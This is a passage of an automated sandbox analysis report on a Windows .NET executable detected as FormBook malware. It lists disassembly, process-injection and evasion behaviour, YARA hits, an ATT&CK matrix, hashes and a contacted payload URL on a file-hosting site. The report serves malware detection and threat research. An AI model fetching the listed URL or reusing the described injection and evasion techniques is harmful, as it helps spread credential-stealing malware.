Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0167EB20 mov eax, dword ptr fs:[00000030h]	2_2_0167EB20
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0167EB20 mov eax, dword ptr fs:[00000030h]	2_2_0167EB20
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01718B28 mov eax, dword ptr fs:[00000030h]	2_2_01718B28
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01718B28 mov eax, dword ptr fs:[00000030h]	2_2_01718B28
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016CEB1D mov eax, dword ptr fs:[00000030h]	2_2_016CEB1D
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016CEB1D mov eax, dword ptr fs:[00000030h]	2_2_016CEB1D
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016CEB1D mov eax, dword ptr fs:[00000030h]	2_2_016CEB1D
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016CEB1D mov eax, dword ptr fs:[00000030h]	2_2_016CEB1D
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016CEB1D mov eax, dword ptr fs:[00000030h]	2_2_016CEB1D
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016CEB1D mov eax, dword ptr fs:[00000030h]	2_2_016CEB1D
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016CEB1D mov eax, dword ptr fs:[00000030h]	2_2_016CEB1D
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016CEB1D mov eax, dword ptr fs:[00000030h]	2_2_016CEB1D
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016CEB1D mov eax, dword ptr fs:[00000030h]	2_2_016CEB1D
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01658BF0 mov eax, dword ptr fs:[00000030h]	2_2_01658BF0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01658BF0 mov eax, dword ptr fs:[00000030h]	2_2_01658BF0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01658BF0 mov eax, dword ptr fs:[00000030h]	2_2_01658BF0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0167EBFC mov eax, dword ptr fs:[00000030h]	2_2_0167EBFC
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016DCBF0 mov eax, dword ptr fs:[00000030h]	2_2_016DCBF0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01650BCD mov eax, dword ptr fs:[00000030h]	2_2_01650BCD
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01650BCD mov eax, dword ptr fs:[00000030h]	2_2_01650BCD
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01650BCD mov eax, dword ptr fs:[00000030h]	2_2_01650BCD
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01670BCB mov eax, dword ptr fs:[00000030h]	2_2_01670BCB
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01670BCB mov eax, dword ptr fs:[00000030h]	2_2_01670BCB
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01670BCB mov eax, dword ptr fs:[00000030h]	2_2_01670BCB
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016FEBD0 mov eax, dword ptr fs:[00000030h]	2_2_016FEBD0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01704BB0 mov eax, dword ptr fs:[00000030h]	2_2_01704BB0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01704BB0 mov eax, dword ptr fs:[00000030h]	2_2_01704BB0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01660BBE mov eax, dword ptr fs:[00000030h]	2_2_01660BBE
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01660BBE mov eax, dword ptr fs:[00000030h]	2_2_01660BBE
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0168CA6F mov eax, dword ptr fs:[00000030h]	2_2_0168CA6F
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0168CA6F mov eax, dword ptr fs:[00000030h]	2_2_0168CA6F
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0168CA6F mov eax, dword ptr fs:[00000030h]	2_2_0168CA6F
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016FEA60 mov eax, dword ptr fs:[00000030h]	2_2_016FEA60
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016CCA72 mov eax, dword ptr fs:[00000030h]	2_2_016CCA72
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016CCA72 mov eax, dword ptr fs:[00000030h]	2_2_016CCA72
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01656A50 mov eax, dword ptr fs:[00000030h]	2_2_01656A50
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01656A50 mov eax, dword ptr fs:[00000030h]	2_2_01656A50
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01656A50 mov eax, dword ptr fs:[00000030h]	2_2_01656A50
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01656A50 mov eax, dword ptr fs:[00000030h]	2_2_01656A50
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01656A50 mov eax, dword ptr fs:[00000030h]	2_2_01656A50
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01656A50 mov eax, dword ptr fs:[00000030h]	2_2_01656A50
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01656A50 mov eax, dword ptr fs:[00000030h]	2_2_01656A50
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01660A5B mov eax, dword ptr fs:[00000030h]	2_2_01660A5B
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01660A5B mov eax, dword ptr fs:[00000030h]	2_2_01660A5B
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0167EA2E mov eax, dword ptr fs:[00000030h]	2_2_0167EA2E
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0168CA24 mov eax, dword ptr fs:[00000030h]	2_2_0168CA24
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0168CA38 mov eax, dword ptr fs:[00000030h]	2_2_0168CA38
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01674A35 mov eax, dword ptr fs:[00000030h]	2_2_01674A35
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01674A35 mov eax, dword ptr fs:[00000030h]	2_2_01674A35
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016DCA11 mov eax, dword ptr fs:[00000030h]	2_2_016DCA11
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0168AAEE mov eax, dword ptr fs:[00000030h]	2_2_0168AAEE
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0168AAEE mov eax, dword ptr fs:[00000030h]	2_2_0168AAEE
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016A6ACC mov eax, dword ptr fs:[00000030h]	2_2_016A6ACC
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016A6ACC mov eax, dword ptr fs:[00000030h]	2_2_016A6ACC
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016A6ACC mov eax, dword ptr fs:[00000030h]	2_2_016A6ACC
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01650AD0 mov eax, dword ptr fs:[00000030h]	2_2_01650AD0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01684AD0 mov eax, dword ptr fs:[00000030h]	2_2_01684AD0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01684AD0 mov eax, dword ptr fs:[00000030h]	2_2_01684AD0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01658AA0 mov eax, dword ptr fs:[00000030h]	2_2_01658AA0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01658AA0 mov eax, dword ptr fs:[00000030h]	2_2_01658AA0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016A6AA4 mov eax, dword ptr fs:[00000030h]	2_2_016A6AA4
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0165EA80 mov eax, dword ptr fs:[00000030h]	2_2_0165EA80
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0165EA80 mov eax, dword ptr fs:[00000030h]	2_2_0165EA80
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0165EA80 mov eax, dword ptr fs:[00000030h]	2_2_0165EA80
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0165EA80 mov eax, dword ptr fs:[00000030h]	2_2_0165EA80
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0165EA80 mov eax, dword ptr fs:[00000030h]	2_2_0165EA80
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0165EA80 mov eax, dword ptr fs:[00000030h]	2_2_0165EA80
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0165EA80 mov eax, dword ptr fs:[00000030h]	2_2_0165EA80
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0165EA80 mov eax, dword ptr fs:[00000030h]	2_2_0165EA80
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0165EA80 mov eax, dword ptr fs:[00000030h]	2_2_0165EA80
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01724A80 mov eax, dword ptr fs:[00000030h]	2_2_01724A80
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01688A90 mov edx, dword ptr fs:[00000030h]	2_2_01688A90
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016E8D6B mov eax, dword ptr fs:[00000030h]	2_2_016E8D6B
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01650D59 mov eax, dword ptr fs:[00000030h]	2_2_01650D59
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01650D59 mov eax, dword ptr fs:[00000030h]	2_2_01650D59
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01650D59 mov eax, dword ptr fs:[00000030h]	2_2_01650D59
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01658D59 mov eax, dword ptr fs:[00000030h]	2_2_01658D59
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01658D59 mov eax, dword ptr fs:[00000030h]	2_2_01658D59
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01658D59 mov eax, dword ptr fs:[00000030h]	2_2_01658D59

Source: C:\Users\user\Desktop\file.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\file.exe

Memory written: C:\Users\user\Desktop\file.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\Desktop\file.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 2.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2217550179.00000000015C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2216787886.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 2.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2217550179.00000000015C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2216787886.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	111 Process Injection	1 Disable or Modify Tools	OS Credential Dumping	121 Security Software Discovery	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 Scheduled Task/Job	41 Virtualization/Sandbox Evasion	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	111 Process Injection	Security Account Manager	41 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	3 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	3 Obfuscated Files or Information	LSA Secrets	12 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Software Packing	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
file.exe	21%	ReversingLabs
file.exe	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

⊘No Antivirus matches

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
files.catbox.moe	108.181.20.35	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://files.catbox.moe/ne8lox.mp4	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://github.com/mgravell/protobuf-net	file.exe, 00000000.00000002.2133699660.0000000006B40000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.2128950880.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2128950880.000000000393A000.00000004.00000800.00020000.00000000.sdmp	false	high
https://files.catbox.moe	file.exe, 00000000.00000002.2111813386.00000000026A1000.00000004.00000800.00020000.00000000.sdmp	false	high
https://github.com/mgravell/protobuf-neti	file.exe, 00000000.00000002.2133699660.0000000006B40000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.2128950880.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2128950880.000000000393A000.00000004.00000800.00020000.00000000.sdmp	false	high
https://stackoverflow.com/q/14436606/23354	file.exe, 00000000.00000002.2133699660.0000000006B40000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.2128950880.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2111813386.000000000274A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2128950880.000000000393A000.00000004.00000800.00020000.00000000.sdmp	false	high
https://files.catbox.moe/ne8lox.mp41OWRumaBvqxiIWy/UyUzNnQ==	file.exe	false	high
https://github.com/mgravell/protobuf-netJ	file.exe, 00000000.00000002.2133699660.0000000006B40000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.2128950880.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2128950880.000000000393A000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	file.exe, 00000000.00000002.2111813386.00000000026A1000.00000004.00000800.00020000.00000000.sdmp	false	high
https://stackoverflow.com/q/11564914/23354;	file.exe, 00000000.00000002.2133699660.0000000006B40000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.2128950880.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2128950880.000000000393A000.00000004.00000800.00020000.00000000.sdmp	false	high
https://stackoverflow.com/q/2152978/23354	file.exe, 00000000.00000002.2133699660.0000000006B40000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.2128950880.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2128950880.000000000393A000.00000004.00000800.00020000.00000000.sdmp	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
108.181.20.35	files.catbox.moe	Canada		852	ASN852CA	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1562756
Start date and time:	2024-11-26 00:11:05 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 16s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	5
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal88.troj.evad.winEXE@3/0@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 95% Number of executed functions: 237 Number of non-executed functions: 231
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: file.exe

Simulations

Behavior and APIs

Time	Type	Description
18:11:56	API Interceptor	46x Sleep call for process: file.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
108.181.20.35	Document.pdf.lnk	Get hash	malicious	Unknown	Browse	files.catbox.moe/p1yr9i.pdf
108.181.20.35	SecuriteInfo.com.HEUR.Trojan.OLE2.Agent.gen.26943.12401.msi	Get hash	malicious	LummaC Stealer	Browse	files.catbox.moe/nzct1p

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
files.catbox.moe	https://drive.google.com/uc?export=download&id=11w_oRLtDWJl2z1SKN0zkobTHd_Ix44t9	Get hash	malicious	Unknown	Browse	108.181.20.35
	LETA_pdf.vbs	Get hash	malicious	AsyncRAT, PureLog Stealer	Browse	108.181.20.35
	file.exe	Get hash	malicious	FormBook	Browse	108.181.20.35
	https://files.catbox.moe/iz3lne.zip	Get hash	malicious	Unknown	Browse	108.181.20.35
	file.exe	Get hash	malicious	FormBook	Browse	108.181.20.35
	file.exe	Get hash	malicious	FormBook	Browse	108.181.20.35
	Exploit Detector LIST (2).bat	Get hash	malicious	Unknown	Browse	108.181.20.35
	1.cmd	Get hash	malicious	Unknown	Browse	108.181.20.35
	Exploit Detector.bat	Get hash	malicious	Unknown	Browse	108.181.20.35
	Exploit Detector LIST (2).bat	Get hash	malicious	Unknown	Browse	108.181.20.35

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ASN852CA	fbot.ppc.elf	Get hash	malicious	Mirai, Moobot	Browse	209.29.180.177
	fbot.x86.elf	Get hash	malicious	Mirai, Moobot	Browse	142.169.14.254
	la.bot.sh4.elf	Get hash	malicious	Unknown	Browse	161.184.125.91
	loligang.spc.elf	Get hash	malicious	Mirai	Browse	99.199.126.12
	loligang.arm7.elf	Get hash	malicious	Mirai	Browse	75.157.133.90
	loligang.mips.elf	Get hash	malicious	Mirai	Browse	207.216.32.196
	apep.mpsl.elf	Get hash	malicious	Mirai	Browse	207.6.179.91
	apep.arm6.elf	Get hash	malicious	Mirai	Browse	75.156.102.38
	powerpc.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	137.186.28.11
	sparc.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	173.180.42.128

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	Orden de compra HO-PO-376-25.exe	Get hash	malicious	AgentTesla, PureLog Stealer, zgRAT	Browse	108.181.20.35
	file.exe	Get hash	malicious	Cryptbot	Browse	108.181.20.35
	INV-0542.pdf.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	108.181.20.35
	Evidence of copyright infringement (2).bat	Get hash	malicious	Unknown	Browse	108.181.20.35
	Evidence of copyright infringement.bat	Get hash	malicious	Unknown	Browse	108.181.20.35
	Compilation of videos and images protected by copyright.bat	Get hash	malicious	Unknown	Browse	108.181.20.35
	Verzameling van video's en afbeeldingen die beschermd zijn door auteursrecht (2).bat	Get hash	malicious	Unknown	Browse	108.181.20.35
	file.exe	Get hash	malicious	LummaC Stealer	Browse	108.181.20.35
	xeno.bat	Get hash	malicious	Unknown	Browse	108.181.20.35
	X4S15uEwg5.bat	Get hash	malicious	Unknown	Browse	108.181.20.35

Dropped Files

⊘No context

Created / dropped Files

⊘No created / dropped files found

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	5.829055340453007
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.97% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	233'472 bytes
MD5:	0a089e934eb856c3e809d0fac53000c7
SHA1:	661f86072031587be18ada0b6606ee82bb52038f
SHA256:	f4e5ec593dcb18dca253d98f5133050e96f27f86c1e46b5882abf797fefe26b1
SHA512:	026152c47e9547d1f2c254bdb824f9b8ac113df6b3a98c61b1ac4adde0286dc8a06ade4a3bd73a149b4a9eaad0f86d702ab4b4042dbb7c17cc0af5a14e34cadc
SSDEEP:	3072:Yc9licCNZFl65sQpIVlccSMXudYCKuY0OUM6Aoft7Gfu4V0tvHwytyUbthvB2C/9:YpFFlssZVlccSMXudcDVilp
TLSH:	B3343B4823C91A92F2EE0F37E4F36A518774FA51AF2FD30F684414FE0865B958951763
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....+Eg............................Z.... ........@.. ....................................`................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x43a25a
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x67452B8B [Tue Nov 26 01:59:39 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3a210	0x4a	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x3c000	0x608	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x39000	0x0	.text
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x3e000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x38260	0x38400	1931c9524e11329e565844fa1d3172d3	False	0.47356770833333334	data	5.852483276358291	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x3c000	0x608	0x800	ff8621dc8a96a099082f9302adaae846	False	0.34228515625	data	3.513048066419696	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
